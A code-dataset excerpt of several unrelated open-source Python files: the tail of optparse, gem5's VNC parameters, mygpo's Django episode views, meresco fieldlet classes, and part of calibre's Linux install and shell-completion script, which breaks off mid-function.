of "%prog" in self.version is replaced by the current program's
name. Does nothing if self.version is empty or undefined.
"""
if self.version:
print(self.get_version(), file=file)
def format_option_help(self, formatter=None):
if formatter is None:
formatter = self.formatter
formatter.store_option_strings(self)
result = []
result.append(formatter.format_heading(_("Options")))
formatter.indent()
if self.option_list:
result.append(OptionContainer.format_option_help(self, formatter))
result.append("\n")
for group in self.option_groups:
result.append(group.format_help(formatter))
result.append("\n")
formatter.dedent()
# Drop the last "\n", or the header if no options or option groups:
return "".join(result[:-1])
def format_epilog(self, formatter):
return formatter.format_epilog(self.epilog)
def format_help(self, formatter=None):
if formatter is None:
formatter = self.formatter
result = []
if self.usage:
result.append(self.get_usage() + "\n")
if self.description:
result.append(self.format_description(formatter) + "\n")
result.append(self.format_option_help(formatter))
result.append(self.format_epilog(formatter))
return "".join(result)
def print_help(self, file=None):
"""print_help(file : file = stdout)
Print an extended help message, listing all options and any
help text provided with them, to 'file' (default stdout).
"""
if file is None:
file = sys.stdout
file.write(self.format_help())
# class OptionParser
def _match_abbrev(s, wordmap):
"""_match_abbrev(s : string, wordmap : {string : Option}) -> string
Return the string key in 'wordmap' for which 's' is an unambiguous
abbreviation. If 's' is found to be ambiguous or doesn't match any of
'words', raise BadOptionError.
"""
# Is there an exact match?
if s in wordmap:
return s
else:
# Isolate all words with s as a prefix.
possibilities = [word for word in wordmap.keys()
if word.startswith(s)]
# No exact match, so there had better be just one possibility.
if len(possibilities) == 1:
return possibilities[0]
elif not possibilities:
raise BadOptionError(s)
else:
# More than one possible completion: ambiguous prefix.
possibilities.sort()
raise AmbiguousOptionError(s, possibilities)
# Some day, there might be many Option classes. As of Optik 1.3, the
# preferred way to instantiate Options is indirectly, via make_option(),
# which will become a factory function when there are many Option
# classes.
make_option = Option
| agpl-3.0 |
haowu4682/gem5 | src/base/vnc/Vnc.py | 66 | 2503 | # Copyright (c) 2010 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: William Wang
from m5.SimObject import SimObject
from m5.params import *
class VncInput(SimObject):
type = 'VncInput'
cxx_header = "base/vnc/vncinput.hh"
frame_capture = Param.Bool(False, "capture changed frames to files")
class VncServer(VncInput):
type = 'VncServer'
cxx_header = "base/vnc/vncserver.hh"
port = Param.TcpPort(5900, "listen port")
number = Param.Int(0, "vnc client number")
| bsd-3-clause |
gpodder/mygpo | mygpo/podcasts/views/episode.py | 1 | 7048 | from datetime import datetime
from functools import wraps
import dateutil.parser
from django.shortcuts import render
from django.http import HttpResponseRedirect, Http404
from django.contrib.auth.decorators import login_required
from django.contrib.sites.requests import RequestSite
from django.contrib.contenttypes.models import ContentType
from django.views.decorators.vary import vary_on_cookie
from django.views.decorators.cache import never_cache, cache_control
from django.contrib import messages
from django.utils.translation import gettext as _
from mygpo.podcasts.models import Podcast, Episode
from mygpo.api.constants import EPISODE_ACTION_TYPES
from mygpo.utils import parse_time, get_timestamp
from mygpo.history.stats import last_played_episodes
from mygpo.publisher.utils import check_publisher_permission
from mygpo.web.utils import get_episode_link_target, check_restrictions
from mygpo.history.models import EpisodeHistoryEntry
from mygpo.favorites.models import FavoriteEpisode
from mygpo.userfeeds.feeds import FavoriteFeed
@vary_on_cookie
@cache_control(private=True)
def episode(request, episode):
podcast = episode.podcast
podcast = check_restrictions(podcast)
user = request.user
if not podcast:
raise Http404
if user.is_authenticated:
is_fav = FavoriteEpisode.objects.filter(user=user, episode=episode).exists()
# pre-populate data for fetch_data
podcasts_dict = {podcast.get_id(): podcast}
episodes_dict = {episode.id.hex: episode}
has_history = EpisodeHistoryEntry.objects.filter(
user=user, episode=episode
).exists()
devices = {c.id.hex: c for c in user.client_set.all()}
else:
has_history = False
is_fav = False
devices = {}
is_publisher = check_publisher_permission(user, podcast)
prev = None # podcast.get_episode_before(episode)
next = None # podcast.get_episode_after(episode)
return render(
request,
"episode.html",
{
"episode": episode,
"podcast": podcast,
"prev": prev,
"next": next,
"has_history": has_history,
"is_favorite": is_fav,
"actions": EPISODE_ACTION_TYPES,
"devices": devices,
"is_publisher": is_publisher,
},
)
@never_cache
@login_required
@vary_on_cookie
@cache_control(private=True)
def history(request, episode):
""" shows the history of the episode """
user = request.user
podcast = episode.podcast
history = (
EpisodeHistoryEntry.objects.filter(user=user, episode=episode)
.order_by("-timestamp")
.prefetch_related(
"episode",
"episode__slugs",
"episode__podcast",
"episode__podcast__slugs",
"client",
)
)
clients = user.client_set.all()
return render(
request,
"episode-history.html",
{
"episode": episode,
"podcast": podcast,
"history": history,
"actions": EPISODE_ACTION_TYPES,
"clients": clients,
},
)
@never_cache
@login_required
def toggle_favorite(request, episode):
user = request.user
fav, created = FavoriteEpisode.objects.get_or_create(user=user, episode=episode)
# if the episode was already a favorite, remove it
if not created:
fav.delete()
podcast = episode.podcast
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
@vary_on_cookie
@cache_control(private=True)
@login_required
def list_favorites(request):
user = request.user
site = RequestSite(request)
favorites = FavoriteEpisode.episodes_for_user(user)
recently_listened = last_played_episodes(user)
favfeed = FavoriteFeed(user)
feed_url = favfeed.get_public_url(site.domain)
podcast = Podcast.objects.filter(urls__url=feed_url).first()
token = request.user.profile.favorite_feeds_token
return render(
request,
"favorites.html",
{
"episodes": favorites,
"feed_token": token,
"site": site,
"podcast": podcast,
"recently_listened": recently_listened,
},
)
@never_cache
def add_action(request, episode):
user = request.user
client = user.client_set.get(id=request.POST.get("device"))
action_str = request.POST.get("action")
timestamp = request.POST.get("timestamp", "")
if timestamp:
try:
timestamp = dateutil.parser.parse(timestamp)
except (ValueError, AttributeError, TypeError):
timestamp = datetime.utcnow()
else:
timestamp = datetime.utcnow()
EpisodeHistoryEntry.create_entry(user, episode, action_str, client, timestamp)
podcast = episode.podcast
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
# To make all view accessible via either IDs or Slugs
# a decorator queries the episode and passes the Id on to the
# regular views
def slug_decorator(f):
@wraps(f)
def _decorator(request, p_slug, e_slug, *args, **kwargs):
pquery = Podcast.objects.filter(slugs__slug=p_slug, slugs__scope="")
try:
podcast = pquery.prefetch_related("slugs").get()
except Podcast.DoesNotExist:
raise Http404
equery = Episode.objects.filter(
podcast=podcast, slugs__slug=e_slug, slugs__scope=podcast.id.hex
)
try:
episode = equery.prefetch_related("urls", "slugs").get()
# set previously fetched podcast, to avoid additional query
episode.podcast = podcast
except Episode.DoesNotExist:
raise Http404
# redirect when Id or a merged (non-cannonical) slug is used
if episode.slug and episode.slug != e_slug:
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
return f(request, episode, *args, **kwargs)
return _decorator
def id_decorator(f):
@wraps(f)
def _decorator(request, p_id, e_id, *args, **kwargs):
try:
query = Episode.objects.filter(id=e_id, podcast_id=p_id)
episode = query.select_related("podcast").get()
except Episode.DoesNotExist:
raise Http404
# redirect when Id or a merged (non-cannonical) slug is used
if episode.slug and episode.slug != e_id:
podcast = episode.podcast
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
return f(request, episode, *args, **kwargs)
return _decorator
show_slug = slug_decorator(episode)
toggle_favorite_slug = slug_decorator(toggle_favorite)
add_action_slug = slug_decorator(add_action)
episode_history_slug = slug_decorator(history)
show_id = id_decorator(episode)
toggle_favorite_id = id_decorator(toggle_favorite)
add_action_id = id_decorator(add_action)
episode_history_id = id_decorator(history)
| agpl-3.0 |
seecr/meresco-components | meresco/components/fieldlets.py | 1 | 2437 | ## begin license ##
#
# "Meresco Components" are components to build searchengines, repositories
# and archives, based on "Meresco Core".
#
# Copyright (C) 2007-2009 SURF Foundation. http://www.surf.nl
# Copyright (C) 2007 SURFnet. http://www.surfnet.nl
# Copyright (C) 2007-2010 Seek You Too (CQ2) http://www.cq2.nl
# Copyright (C) 2007-2009 Stichting Kennisnet Ict op school. http://www.kennisnetictopschool.nl
# Copyright (C) 2011-2012 Seecr (Seek You Too B.V.) http://seecr.nl
#
# This file is part of "Meresco Components"
#
# "Meresco Components" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Components" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Components"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from meresco.core import Transparent, Observable
from meresco.core.generatorutils import asyncnoreturnvalue
class _Fieldlet(Transparent):
def __init__(self, method):
Transparent.__init__(self)
self._method = method
class FilterFieldValue(_Fieldlet):
def addField(self, name, value):
if self._method(value):
self.do.addField(name=name, value=value)
class FilterField(_Fieldlet):
def addField(self, name, value):
if self._method(name):
self.do.addField(name=name, value=value)
class RenameField(_Fieldlet):
def addField(self, name, value):
self.do.addField(name=self._method(name), value=value)
class TransformFieldValue(_Fieldlet):
def addField(self, name, value):
newValue = self._method(value)
if newValue != None:
self.do.addField(name=name, value=newValue)
class AddField(Observable):
def __init__(self, name, value):
Observable.__init__(self)
self._name = name
self._value = value
@asyncnoreturnvalue
def add(self, *args, **kwargs):
self.do.addField(name=self._name, value=self._value)
| gpl-2.0 |
ashang/calibre | src/calibre/linux.py | 5 | 45743 | __license__ = 'GPL v3'
__copyright__ = '2008, Kovid Goyal <kovid at kovidgoyal.net>'
''' Post installation script for linux '''
import sys, os, cPickle, textwrap, stat, errno
from subprocess import check_call, check_output
from functools import partial
from calibre import __appname__, prints, guess_type
from calibre.constants import islinux, isbsd
from calibre.customize.ui import all_input_formats
from calibre.ptempfile import TemporaryDirectory
from calibre import CurrentDir
entry_points = {
'console_scripts': [
'ebook-device = calibre.devices.cli:main',
'ebook-meta = calibre.ebooks.metadata.cli:main',
'ebook-convert = calibre.ebooks.conversion.cli:main',
'ebook-polish = calibre.ebooks.oeb.polish.main:main',
'markdown-calibre = calibre.ebooks.markdown.__main__:run',
'web2disk = calibre.web.fetch.simple:main',
'calibre-server = calibre.library.server.main:main',
'lrf2lrs = calibre.ebooks.lrf.lrfparser:main',
'lrs2lrf = calibre.ebooks.lrf.lrs.convert_from:main',
'calibre-debug = calibre.debug:main',
'calibredb = calibre.library.cli:main',
'calibre-parallel = calibre.utils.ipc.worker:main',
'calibre-customize = calibre.customize.ui:main',
'calibre-complete = calibre.utils.complete:main',
'fetch-ebook-metadata = calibre.ebooks.metadata.sources.cli:main',
'calibre-smtp = calibre.utils.smtp:main',
],
'gui_scripts' : [
__appname__+' = calibre.gui_launch:calibre',
'lrfviewer = calibre.gui2.lrf_renderer.main:main',
'ebook-viewer = calibre.gui_launch:ebook_viewer',
'ebook-edit = calibre.gui_launch:ebook_edit',
],
}
class PreserveMIMEDefaults(object):
def __init__(self):
self.initial_values = {}
def __enter__(self):
def_data_dirs = '/usr/local/share:/usr/share'
paths = os.environ.get('XDG_DATA_DIRS', def_data_dirs)
paths = paths.split(':')
paths.append(os.environ.get('XDG_DATA_HOME', os.path.expanduser(
'~/.local/share')))
paths = list(filter(os.path.isdir, paths))
if not paths:
# Env var had garbage in it, ignore it
paths = def_data_dirs.split(':')
paths = list(filter(os.path.isdir, paths))
self.paths = {os.path.join(x, 'applications/defaults.list') for x in
paths}
self.initial_values = {}
for x in self.paths:
try:
with open(x, 'rb') as f:
self.initial_values[x] = f.read()
except:
self.initial_values[x] = None
def __exit__(self, *args):
for path, val in self.initial_values.iteritems():
if val is None:
try:
os.remove(path)
except:
pass
elif os.path.exists(path):
try:
with open(path, 'r+b') as f:
if f.read() != val:
f.seek(0)
f.truncate()
f.write(val)
except EnvironmentError as e:
if e.errno != errno.EACCES:
raise
# Uninstall script {{{
UNINSTALL = '''\
#!{python}
from __future__ import print_function, unicode_literals
euid = {euid}
import os, subprocess, shutil
try:
raw_input
except NameError:
raw_input = input
if os.geteuid() != euid:
print ('The installer was last run as user id:', euid, 'To remove all files you must run the uninstaller as the same user')
if raw_input('Proceed anyway? [y/n]:').lower() != 'y':
raise SystemExit(1)
frozen_path = {frozen_path!r}
if not frozen_path or not os.path.exists(os.path.join(frozen_path, 'resources', 'calibre-mimetypes.xml')):
frozen_path = None
for f in {mime_resources!r}:
cmd = ['xdg-mime', 'uninstall', f]
print ('Removing mime resource:', os.path.basename(f))
ret = subprocess.call(cmd, shell=False)
if ret != 0:
print ('WARNING: Failed to remove mime resource', f)
for x in tuple({manifest!r}) + tuple({appdata_resources!r}) + (os.path.abspath(__file__), __file__, frozen_path):
if not x or not os.path.exists(x):
continue
print ('Removing', x)
try:
if os.path.isdir(x):
shutil.rmtree(x)
else:
os.unlink(x)
except Exception as e:
print ('Failed to delete', x)
print ('\t', e)
icr = {icon_resources!r}
mimetype_icons = []
def remove_icon(context, name, size, update=False):
cmd = ['xdg-icon-resource', 'uninstall', '--context', context, '--size', size, name]
if not update:
cmd.insert(2, '--noupdate')
print ('Removing icon:', name, 'from context:', context, 'at size:', size)
ret = subprocess.call(cmd, shell=False)
if ret != 0:
print ('WARNING: Failed to remove icon', name)
for i, (context, name, size) in enumerate(icr):
if context == 'mimetypes':
mimetype_icons.append((name, size))
continue
remove_icon(context, name, size, update=i == len(icr) - 1)
mr = {menu_resources!r}
for f in mr:
cmd = ['xdg-desktop-menu', 'uninstall', f]
print ('Removing desktop file:', f)
ret = subprocess.call(cmd, shell=False)
if ret != 0:
print ('WARNING: Failed to remove menu item', f)
print ()
if mimetype_icons and raw_input('Remove the ebook format icons? [y/n]:').lower() in ['', 'y']:
for i, (name, size) in enumerate(mimetype_icons):
remove_icon('mimetypes', name, size, update=i == len(mimetype_icons) - 1)
'''
# }}}
# Completion {{{
class ZshCompleter(object): # {{{
def __init__(self, opts):
self.opts = opts
self.dest = None
base = os.path.dirname(self.opts.staging_sharedir)
self.detect_zsh(base)
if not self.dest and base == '/usr/share':
# Ubuntu puts site-functions in /usr/local/share
self.detect_zsh('/usr/local/share')
self.commands = {}
def detect_zsh(self, base):
for x in ('vendor-completions', 'vendor-functions', 'site-functions'):
c = os.path.join(base, 'zsh', x)
if os.path.isdir(c) and os.access(c, os.W_OK):
self.dest = os.path.join(c, '_calibre')
break
def get_options(self, parser, cover_opts=('--cover',), opf_opts=('--opf',),
file_map={}):
if hasattr(parser, 'option_list'):
options = parser.option_list
for group in parser.option_groups:
options += group.option_list
else:
options = parser
for opt in options:
lo, so = opt._long_opts, opt._short_opts
if opt.takes_value():
lo = [x+'=' for x in lo]
so = [x+'+' for x in so]
ostrings = lo + so
ostrings = u'{%s}'%','.join(ostrings) if len(ostrings) > 1 else ostrings[0]
exclude = u''
if opt.dest is None:
exclude = u"'(- *)'"
h = opt.help or ''
h = h.replace('"', "'").replace('[', '(').replace(
']', ')').replace('\n', ' ').replace(':', '\\:').replace('`', "'")
h = h.replace('%default', type(u'')(opt.default))
arg = ''
if opt.takes_value():
arg = ':"%s":'%h
if opt.dest in {'extract_to', 'debug_pipeline', 'to_dir', 'outbox', 'with_library', 'library_path'}:
arg += "'_path_files -/'"
elif opt.choices:
arg += "(%s)"%'|'.join(opt.choices)
elif set(file_map).intersection(set(opt._long_opts)):
k = set(file_map).intersection(set(opt._long_opts))
exts = file_map[tuple(k)[0]]
if exts:
arg += "'_files -g \"%s\"'"%(' '.join('*.%s'%x for x in
tuple(exts) + tuple(x.upper() for x in exts)))
else:
arg += "_files"
elif (opt.dest in {'pidfile', 'attachment'}):
arg += "_files"
elif set(opf_opts).intersection(set(opt._long_opts)):
arg += "'_files -g \"*.opf\"'"
elif set(cover_opts).intersection(set(opt._long_opts)):
arg += "'_files -g \"%s\"'"%(' '.join('*.%s'%x for x in
tuple(pics) + tuple(x.upper() for x in pics)))
help_txt = u'"[%s]"'%h
yield u'%s%s%s%s '%(exclude, ostrings, help_txt, arg)
def opts_and_exts(self, name, op, exts, cover_opts=('--cover',),
opf_opts=('--opf',), file_map={}):
if not self.dest:
return
exts = sorted({x.lower() for x in exts})
extra = ('''"*:filename:_files -g '(#i)*.(%s)'" ''' % '|'.join(exts),)
opts = '\\\n '.join(tuple(self.get_options(
op(), cover_opts=cover_opts, opf_opts=opf_opts, file_map=file_map)) + extra)
txt = '_arguments -s \\\n ' + opts
self.commands[name] = txt
def opts_and_words(self, name, op, words, takes_files=False):
if not self.dest:
return
extra = ("'*:filename:_files' ",) if takes_files else ()
opts = '\\\n '.join(tuple(self.get_options(op())) + extra)
txt = '_arguments -s \\\n ' + opts
self.commands[name] = txt
def do_ebook_convert(self, f):
from calibre.ebooks.conversion.plumber import supported_input_formats
from calibre.web.feeds.recipes.collection import get_builtin_recipe_titles
from calibre.customize.ui import available_output_formats
from calibre.ebooks.conversion.cli import create_option_parser, group_titles
from calibre.utils.logging import DevNull
input_fmts = set(supported_input_formats())
output_fmts = set(available_output_formats())
iexts = {x.upper() for x in input_fmts}.union(input_fmts)
oexts = {x.upper() for x in output_fmts}.union(output_fmts)
w = lambda x: f.write(x if isinstance(x, bytes) else x.encode('utf-8'))
# Arg 1
w('\n_ebc_input_args() {')
w('\n local extras; extras=(')
w('\n {-h,--help}":Show Help"')
w('\n "--version:Show program version"')
w('\n "--list-recipes:List builtin recipe names"')
for recipe in sorted(set(get_builtin_recipe_titles())):
recipe = recipe.replace(':', '\\:').replace('"', '\\"')
w(u'\n "%s.recipe"'%(recipe))
w('\n ); _describe -t recipes "ebook-convert builtin recipes" extras')
w('\n _files -g "%s"'%' '.join(('*.%s'%x for x in iexts)))
w('\n}\n')
# Arg 2
w('\n_ebc_output_args() {')
w('\n local extras; extras=(')
for x in output_fmts:
w('\n ".{0}:Convert to a .{0} file with the same name as the input file"'.format(x))
w('\n ); _describe -t output "ebook-convert output" extras')
w('\n _files -g "%s"'%' '.join(('*.%s'%x for x in oexts)))
w('\n _path_files -/')
w('\n}\n')
log = DevNull()
def get_parser(input_fmt='epub', output_fmt=None):
of = ('dummy2.'+output_fmt) if output_fmt else 'dummy'
return create_option_parser(('ec', 'dummy1.'+input_fmt, of, '-h'), log)[0]
# Common options
input_group, output_group = group_titles()
p = get_parser()
opts = p.option_list
for group in p.option_groups:
if group.title not in {input_group, output_group}:
opts += group.option_list
opts.append(p.get_option('--pretty-print'))
opts.append(p.get_option('--input-encoding'))
opts = '\\\n '.join(tuple(
self.get_options(opts, file_map={'--search-replace':()})))
w('\n_ebc_common_opts() {')
w('\n _arguments -s \\\n ' + opts)
w('\n}\n')
# Input/Output format options
for fmts, group_title, func in (
(input_fmts, input_group, '_ebc_input_opts_%s'),
(output_fmts, output_group, '_ebc_output_opts_%s'),
):
for fmt in fmts:
is_input = group_title == input_group
if is_input and fmt in {'rar', 'zip', 'oebzip'}:
continue
p = (get_parser(input_fmt=fmt) if is_input
else get_parser(output_fmt=fmt))
opts = None
for group in p.option_groups:
if group.title == group_title:
opts = [o for o in group.option_list if
'--pretty-print' not in o._long_opts and
'--input-encoding' not in o._long_opts]
if not opts:
continue
opts = '\\\n '.join(tuple(self.get_options(opts)))
w('\n%s() {'%(func%fmt))
w('\n _arguments -s \\\n ' + opts)
w('\n}\n')
w('\n_ebook_convert() {')
w('\n local iarg oarg context state_descr state line\n typeset -A opt_args\n local ret=1')
w("\n _arguments '1: :_ebc_input_args' '*::ebook-convert output:->args' && ret=0")
w("\n case $state in \n (args)")
w('\n iarg=${line[1]##*.}; ')
w("\n _arguments '1: :_ebc_output_args' '*::ebook-convert options:->args' && ret=0")
w("\n case $state in \n (args)")
w('\n oarg=${line[1]##*.}')
w('\n iarg="_ebc_input_opts_${(L)iarg}"; oarg="_ebc_output_opts_${(L)oarg}"')
w('\n _call_function - $iarg; _call_function - $oarg; _ebc_common_opts; ret=0')
w('\n ;;\n esac')
w("\n ;;\n esac\n return ret")
w('\n}\n')
def do_ebook_edit(self, f):
from calibre.ebooks.oeb.polish.main import SUPPORTED
from calibre.ebooks.oeb.polish.import_book import IMPORTABLE
from calibre.gui2.tweak_book.main import option_parser
tweakable_fmts = SUPPORTED | IMPORTABLE
parser = option_parser()
opt_lines = []
for opt in parser.option_list:
lo, so = opt._long_opts, opt._short_opts
if opt.takes_value():
lo = [x+'=' for x in lo]
so = [x+'+' for x in so]
ostrings = lo + so
ostrings = u'{%s}'%','.join(ostrings) if len(ostrings) > 1 else '"%s"'%ostrings[0]
h = opt.help or ''
h = h.replace('"', "'").replace('[', '(').replace(
']', ')').replace('\n', ' ').replace(':', '\\:').replace('`', "'")
h = h.replace('%default', type(u'')(opt.default))
help_txt = u'"[%s]"'%h
opt_lines.append(ostrings + help_txt + ' \\')
opt_lines = ('\n' + (' ' * 8)).join(opt_lines)
f.write((ur'''
_ebook_edit() {
local curcontext="$curcontext" state line ebookfile expl
typeset -A opt_args
_arguments -C -s \
%s
"1:ebook file:_files -g '(#i)*.(%s)'" \
'*:file in ebook:->files' && return 0
case $state in
files)
ebookfile=${~${(Q)line[1]}}
if [[ -f "$ebookfile" && "$ebookfile" =~ '\.[eE][pP][uU][bB]$' ]]; then
_zip_cache_name="$ebookfile"
_zip_cache_list=( ${(f)"$(zipinfo -1 $_zip_cache_name 2>/dev/null)"} )
else
return 1
fi
_wanted files expl 'file from ebook' \
_multi_parts / _zip_cache_list && return 0
;;
esac
return 1
}
''' % (opt_lines, '|'.join(tweakable_fmts)) + '\n\n').encode('utf-8'))
def do_calibredb(self, f):
import calibre.library.cli as cli
from calibre.customize.ui import available_catalog_formats
parsers, descs = {}, {}
for command in cli.COMMANDS:
op = getattr(cli, '%s_option_parser'%command)
args = [['t.epub']] if command == 'catalog' else []
p = op(*args)
if isinstance(p, tuple):
p = p[0]
parsers[command] = p
lines = [x.strip().partition('.')[0] for x in p.usage.splitlines() if x.strip() and
not x.strip().startswith('%prog')]
descs[command] = lines[0]
f.write('\n_calibredb_cmds() {\n local commands; commands=(\n')
f.write(' {-h,--help}":Show help"\n')
f.write(' "--version:Show version"\n')
for command, desc in descs.iteritems():
f.write(' "%s:%s"\n'%(
command, desc.replace(':', '\\:').replace('"', '\'')))
f.write(' )\n _describe -t commands "calibredb command" commands \n}\n')
subcommands = []
for command, parser in parsers.iteritems():
exts = []
if command == 'catalog':
exts = [x.lower() for x in available_catalog_formats()]
elif command == 'set_metadata':
exts = ['opf']
exts = set(exts).union(x.upper() for x in exts)
pats = ('*.%s'%x for x in exts)
extra = ("'*:filename:_files -g \"%s\"' "%' '.join(pats),) if exts else ()
if command in {'add', 'add_format'}:
extra = ("'*:filename:_files' ",)
opts = '\\\n '.join(tuple(self.get_options(
parser)) + extra)
txt = ' _arguments -s \\\n ' + opts
subcommands.append('(%s)'%command)
subcommands.append(txt)
subcommands.append(';;')
f.write('\n_calibredb() {')
f.write((
r'''
local state line state_descr context
typeset -A opt_args
local ret=1
_arguments \
'1: :_calibredb_cmds' \
'*::calibredb subcommand options:->args' \
&& ret=0
case $state in
(args)
case $line[1] in
(-h|--help|--version)
_message 'no more arguments' && ret=0
;;
%s
esac
;;
esac
return ret
'''%'\n '.join(subcommands)).encode('utf-8'))
f.write('\n}\n\n')
def write(self):
if self.dest:
for c in ('calibredb', 'ebook-convert', 'ebook-edit'):
self.commands[c] = ' _%s "$@"' % c.replace('-', '_')
with open(self.dest, 'wb') as f:
f.write('#compdef ' + ' '.join(self.commands)+'\n')
self.do_ebook_convert(f)
self.do_calibredb(f)
self.do_ebook_edit(f)
f.write('case $service in\n')
for c, txt in self.commands.iteritems():
if isinstance(txt, type(u'')):
txt = txt.encode('utf-8')
if isinstance(c, type(u'')):
c = c.encode('utf-8')
f.write(b'%s)\n%s\n;;\n'%(c, txt))
f.write('esac\n')
# }}}
def get_bash_completion_path(root, share, info):
if root == '/usr':
# Try to get the system bash completion dir since we are installing to
# /usr
try:
path = check_output('pkg-config --variable=completionsdir bash-completion'.split()).strip().partition(os.pathsep)[0]
except Exception:
info('Failed to find directory to install bash completions, using default.')
path = '/usr/share/bash-completion/completions'
if path and os.path.exists(path) and os.path.isdir(path):
return os.path.join(path, 'calibre')
else:
# Use the default bash-completion dir under staging_share
return os.path.join(share, 'bash-completion', 'completions', 'calibre')
def write_completion(bash_comp_dest, zsh):
from calibre.ebooks.metadata.cli import option_parser as metaop, filetypes as meta_filetypes
from calibre.ebooks.lrf.lrfparser import option_parser as lrf2lrsop
from calibre.gui2.lrf_renderer.main import option_parser as lrfviewerop
from calibre.gui2.viewer.main import option_parser as viewer_op
from calibre.gui2.tweak_book.main import option_parser as tweak_op
from calibre.ebooks.metadata.sources.cli import option_parser as fem_op
from calibre.gui2.main import option_parser as guiop
from calibre.utils.smtp import option_parser as smtp_op
from calibre.library.server.main import option_parser as serv_op
from calibre.ebooks.oeb.polish.main import option_parser as polish_op, SUPPORTED
from calibre.ebooks.oeb.polish.import_book import IMPORTABLE
from calibre.debug import option_parser as debug_op
from calibre.ebooks import BOOK_EXTENSIONS
from calibre.customize.ui import available_input_formats
input_formats = sorted(all_input_formats())
tweak_formats = sorted(x.lower() for x in SUPPORTED|IMPORTABLE)
if bash_comp_dest and not os.path.exists(os.path.dirname(bash_comp_dest)):
os.makedirs(os.path.dirname(bash_comp_dest))
complete = 'calibre-complete'
if getattr(sys, 'frozen_path', None):
complete = os.path.join(getattr(sys, 'frozen_path'), complete)
with open(bash_comp_dest or os.devnull, 'wb') as f:
def o_and_e(*args, **kwargs):
f.write(opts_and_exts(*args, **kwargs))
zsh.opts_and_exts(*args, **kwargs)
def o_and_w(*args, **kwargs):
f.write(opts_and_words(*args, **kwargs))
zsh.opts_and_words(*args, **kwargs)
f.write('# calibre Bash Shell Completion\n')
o_and_e('calibre', guiop, BOOK_EXTENSIONS)
o_and_e('lrf2lrs', lrf2lrsop, ['lrf'], file_map={'--output':['lrs']})
o_and_e('ebook-meta', metaop,
list(meta_filetypes()), cover_opts=['--cover', '-c'],
opf_opts=['--to-opf', '--from-opf'])
o_and_e('ebook-polish', polish_op,
[x.lower() for x in SUPPORTED], cover_opts=['--cover', '-c'],
opf_opts=['--opf', '-o'])
o_and_e('lrfviewer', lrfviewerop, ['lrf'])
o_and_e('ebook-viewer', viewer_op, input_formats)
o_and_e('ebook-edit', tweak_op, tweak_formats)
o_and_w('fetch-ebook-metadata', fem_op, [])
o_and_w('calibre-smtp', smtp_op, [])
o_and_w('calibre-server', serv_op, [])
o_and_e('calibre-debug', debug_op, ['py', 'recipe', 'mobi', 'azw', 'azw3', 'docx'], file_map={
'--tweak-book':['epub', 'azw3', 'mobi'],
'--subset-font':['ttf', 'otf'],
'--exec-file':['py', 'recipe'],
'--add-simple-plugin':['py'],
'--inspect-mobi':['mobi', 'azw', 'azw3'],
'--viewer':list(available_input_formats()),
})
f.write(textwrap.dedent('''
_ebook_device_ls()
{
local pattern search listing prefix
pattern="$1"
search="$1"
if [[ -n "{$pattern}" ]]; then
if [[ "${pattern:(-1)}" == "/" ]]; then
pattern=""
else
pattern="$(basename ${pattern} 2> /dev/null)"
search="$(dirname ${search} 2> /dev/null)"
fi
fi
if [[ "x${search}" == "x" || "x${search}" == "x." ]]; then
search="/"
fi
listing="$(ebook-device ls ${search} 2>/dev/null)"
prefix="${search}"
if [[ "x${prefix:(-1)}" != "x/" ]]; then
prefix="${prefix}/"
fi
echo $(compgen -P "${prefix}" -W "${listing}" "${pattern}")
}
_ebook_device()
{
local cur prev
cur="${COMP_WORDS[COMP_CWORD]}"
prev="${COMP_WORDS[COMP_CWORD-1]}"
COMPREPLY=()
case "${prev}" in
ls|rm|mkdir|touch|cat )
COMPREPLY=( $(_ebook_device_ls "${cur}") )
return 0
;;
cp )
if [[ ${cur} == dev:* ]]; then
COMPREPLY=( $(_ebook_device_ls "${cur:7}") )
return 0
else
_filedir
return 0
fi
;;
dev )
COMPREPLY=( $(compgen -W "cp ls rm mkdir touch cat info books df" "${cur}") )
return 0
;;
* )
if [[ ${cur} == dev:* ]]; then
COMPREPLY=( $(_ebook_device_ls "${cur:7}") )
return 0
else
if [[ ${prev} == dev:* ]]; then
_filedir
return 0
else
